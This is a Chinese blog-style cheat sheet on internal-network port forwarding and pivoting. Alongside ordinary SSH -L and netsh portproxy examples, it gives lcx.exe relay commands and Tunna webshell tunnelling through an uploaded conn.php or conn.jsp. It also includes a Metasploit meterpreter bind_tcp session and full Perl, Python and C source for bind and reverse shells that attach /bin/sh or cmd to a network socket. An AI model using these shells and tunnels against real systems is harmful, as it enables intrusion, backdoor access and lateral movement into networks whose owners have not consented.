Linux
ssh
- SA 服务器
- CA 客户A
- CB 客户B
CA通过SA访问CB服务,在CA上执行
ssh USER@HOST_A -P HOST_A_SSH_PORT -L 127.0.0.1:LOCAL_PORT:HOST_B:HOST_B_PORT例:映射远程 MySQL端口至本地 端口 13306
ssh root@1.2.3.4 -P 22 -L 127.0.0.1:13306:10.0.0.102:3306putty配置
Connection -> SSH -> Tunnels
Source portport 本地端口Destinationip:port 目标IP:端口- 选项
Local与Auto
Windows
netsh
Windows 2000/XP/2003中均带有Netsh命令。Windows Server 2008只是对netsh的参数项做了些扩展。
首先安装IPV6(xp下IPV6必须安装)
netsh interface ipv6 install添加一个IPV4到IPV4的端口映射
netsh interface portproxy add v4tov4 listenaddress=192.168.1.1 listenport=22 connectaddress=xxx.xxx.xxx.xxx connectport=22删除指定监听ip和端口
netsh interface portproxy delete v4tov4 listenaddress=192.168.1.1 listenport=22查看存在的转发
netsh interface portproxy show alllcx.exe
lcx.exe -l 3333 4444lcx.exe -s your-server-ip 3333 127.0.0.1 3389Web
tunna
支持环境
- conn.jsp Tested on Apache Tomcat (windows + linux)
- conn.aspx Tested on IIS 6+8 (windows server 2003/2012)
- conn.php Tested on LAMP + XAMPP + IIS (windows + linux)
下载地址:http://www.secforce.com/media/tools/tunna_v0.1.zip
上传conn.php到主机,本地执行
python proxy.py -u http://192.x.x.x/conn.php -l 13389 -r 3389 -vSSH,还需要添加-s参数,才能保证连接的时候不会中断
python proxy.py -u http://192.x.x.x/conn.php -l 13389 -r 3389 -s -v转发IP
python proxy.py -u http://192.x.x.x/conn.php -l 13389 -a 172.16.1.33 -r 3389把tunna_exploit.rb拷贝到msf的modules/exploits/windows/misc目录
cp ~/tunna_exploit.rb /root/metasploit-framework/modules/exploits/windows/misc
msf > use exploit/windows/misc/tunna_exploit
msf exploit(tunna_exploit) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(tunna_exploit) > set RHOST 1.3.3.7 <-- 注意这里是指本地的公网IP
RHOST => 1.3.3.7
msf exploit(tunna_exploit) > set TARGETURI http://219.x.x.x:8080/conn.jsp
TARGETURI => http://219.x.x.x:8080/conn.jsp
msf exploit(tunna_exploit) > set VERBOSE true
VERBOSE => true
msf exploit(tunna_exploit) > exploit -j
reDuh-GUI
- 不需要JAVA运行环境
- 可视化操作
- 支持HTTP/HTTPS
- 支持二级代理
reDuh-GUI http://down2.nosec.org/reDuhGUI_0.1.rar
脚本
perl
#!/usr/bin/perl
$os = $^O;
$SHELL = "/bin/sh";
if ( $os =~ m/win/i ) { $SHELL = "%COMSPEC% /K"; }
if ( @ARGV < 1 ) { exit(1); }
$LISTEN_PORT = $ARGV[0];
use Socket;
$protocol = getprotobyname('tcp');
socket( S, &PF_INET, &SOCK_STREAM, $protocol ) || die("error\n");
setsockopt( S, SOL_SOCKET, SO_REUSEADDR, 1 );
bind( S, sockaddr_in( $LISTEN_PORT, INADDR_ANY ) ) || die("error\n");
listen( S, 3 ) || die "";
while (1) {
accept( CONN, S );
if ( !( $pid = fork ) ) {
die "Cannot fork" if ( !defined $pid );
open STDIN, "<&CONN";
open STDOUT, ">&CONN";
open STDERR, ">&CONN";
exec $SHELL || die("error\n");
close CONN;
exit 0;
}
}python
#!/usr/bin/env python
import os, sys, socket, time
MAX_LEN=1024
SHELL="/bin/bash -c"
TIME_OUT=300
PORT=""
HOST=""
def shell(cmd):
sh_out=os.popen(SHELL+" "+cmd).readlines()
nsh_out=""
for i in range(len(sh_out)):
nsh_out+=sh_out[i]
return nsh_out
def action(conn):
while True:
try:
pcmd=conn.recv(MAX_LEN)
except:
print("error\n")
return True
else:
cmd=""
for i in range(len(pcmd)-1):
cmd+=pcmd[i]
if cmd==":dc":
return True
elif cmd==":sd":
return False
else:
if len(cmd)>0:
out=shell(cmd)
conn.send(out)
argv=sys.argv
if len(argv)==2:
PORT=argv[1]
elif len(argv)==3:
PORT=argv[1]
HOST=argv[2]
else: exit(1)
PORT=int(PORT)
if os.fork()!=0:
sys.exit(0)
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(TIME_OUT)
if len(argv)==2:
sock.bind(('localhost', PORT))
sock.listen(0)
run=True
while run:
if len(argv)==3:
try: sock.connect((HOST, PORT))
except:
print("error\n")
time.sleep(5)
else: run=action(sock)
else:
try: (conn,addr)=sock.accept()
except:
print("error\n")
time.sleep(1)
else: run=action(conn)
if len(argv)==2: conn.shutdown(2)
else:
try: sock.send("")
except: time.sleep(1)
else: sock.shutdown(2)c
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <errno.h>
int main( argc, argv )
int argc;
char **argv; {
int sockfd, newfd;
struct sockaddr_in remote;
if ( fork() == 0 )
{
remote.sin_family = AF_INET;
remote.sin_port = htons( atoi( argv[1] ) );
remote.sin_addr.s_addr = htonl( INADDR_ANY );
sockfd = socket( AF_INET, SOCK_STREAM, 0 );
if ( !sockfd )
perror( "error\n" );
bind( sockfd, (struct sockaddr *) &remote, 0x10 );
listen( sockfd, 5 );
while ( 1 )
{
newfd = accept( sockfd, 0, 0 );
dup2( newfd, 0 );
dup2( newfd, 1 );
dup2( newfd, 2 );
execl( "/bin/sh", "sh", (char *) 0 );
close( newfd );
}
}
}
int chpass( char *base, char *entered )
{
int i;
for ( i = 0; i < strlen( entered ); i++ )
{
if ( entered[i] == '\n' )
entered[i] = '\0';
if ( entered[i] == '\r' )
entered[i] = '\0';
}
if ( !strcmp( base, entered ) )
return(0);
}参考
- 内网端口转发方法汇总 http://silic.org/post/Port_Forwarding_from_Intranet_Multiple_Collection
- tunna工具使用实例 http://drops.wooyun.org/tools/650
- 通过ssh端口映射 间接访问远程内网服务器 http://mrasong.com/a/ssh-port-forword
- windows命令行下用netsh实现端口转发(端口映射) http://blog.phpdr.net/windows%E5%91%BD%E4%BB%A4%E8%A1%8C%E4%B8%8B%E7%94%A8netsh%E5%AE%9E%E7%8E%B0%E7%AB%AF%E5%8F%A3%E8%BD%AC%E5%8F%91%E7%AB%AF%E5%8F%A3%E6%98%A0%E5%B0%84.html
扫一扫
1997
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
